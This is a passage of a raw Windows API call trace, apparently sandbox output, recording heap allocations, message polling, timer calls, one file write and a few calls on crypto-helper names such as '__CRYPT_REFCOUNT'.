lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0257.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0257.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0257.469] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0257.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0257.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0257.469] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0257.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0257.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55df8 [0257.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0257.469] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0257.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55df8 | out: hHeap=0x970000) returned 1 [0257.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0257.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51430 [0257.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0257.470] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0257.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0257.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0257.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0257.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0257.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0257.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0257.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0257.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0257.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0257.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0257.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0257.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0257.470] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0257.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0257.548] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0257.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0257.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0257.548] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0257.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0257.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0257.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0257.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0257.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0257.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0257.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0257.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0257.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0257.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0257.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90f8) returned 0x2f38410 [0257.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0257.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0257.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90f8) returned 0x2e7f320 [0257.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0257.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0257.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f38410 | out: hHeap=0x970000) returned 1 [0257.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0257.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0257.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0257.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0257.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0257.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90f8) returned 0x2f38410 [0257.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0257.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0257.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0257.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90f8) returned 0x2e7f320 [0257.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f38410 | out: hHeap=0x970000) returned 1 [0257.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0257.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0257.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0257.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0257.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0257.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0257.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0257.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0257.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0257.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0257.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0257.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0257.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0257.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0257.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0257.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0257.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0257.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0257.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0257.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0257.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0257.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0257.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0257.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0257.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0257.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0257.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0257.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0257.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0257.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0257.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0257.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0257.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0257.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2f310 | out: hHeap=0x970000) returned 1 [0257.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0257.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0257.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0257.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0257.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0257.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0257.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0257.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0257.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0257.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0257.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0257.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0257.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0257.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0257.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0257.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0257.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0257.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f26210 | out: hHeap=0x970000) returned 1 [0257.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0257.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0257.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0257.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0257.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0257.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f41510 | out: hHeap=0x970000) returned 1 [0257.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0257.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0257.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0257.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0257.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0257.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0257.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0257.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0257.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0257.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0257.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0257.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0257.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0257.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0257.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0257.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0257.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0257.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1d110 | out: hHeap=0x970000) returned 1 [0257.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0257.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0257.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90f8) returned 0x2f14010 [0257.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0257.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0257.568] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0257.569] TranslateMessage (lpMsg=0x8cf708) returned 0 [0257.569] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0257.569] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0257.569] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0257.569] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0257.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0257.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0257.569] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0257.569] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0257.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0257.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0257.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0257.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0257.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0257.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0257.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90f8) returned 0x2f1d110 [0257.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0257.571] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f1d110*, nNumberOfBytesToWrite=0x90f8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f1d110*, lpNumberOfBytesWritten=0x8cf5e4*=0x90f8, lpOverlapped=0x0) returned 1 [0257.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0257.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1d110 | out: hHeap=0x970000) returned 1 [0257.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0257.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0257.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0257.576] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0257.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0257.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0257.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0257.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0257.576] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0257.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0257.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0257.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0257.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0257.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0257.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0257.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510a0 [0257.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0257.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0257.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0257.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0257.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0257.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0257.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0257.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0257.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0257.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0257.577] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0257.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0257.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0257.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0257.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f58 [0257.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0257.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0257.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0257.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0257.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0257.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0257.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0257.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0257.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0257.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0257.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0257.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0257.578] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0257.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0257.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0257.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0257.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0257.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0257.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0257.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0257.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0257.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0257.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0257.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0257.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0257.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0257.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0257.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0257.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ff0 [0257.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0257.579] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0257.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ff0 | out: hHeap=0x970000) returned 1 [0257.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0257.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 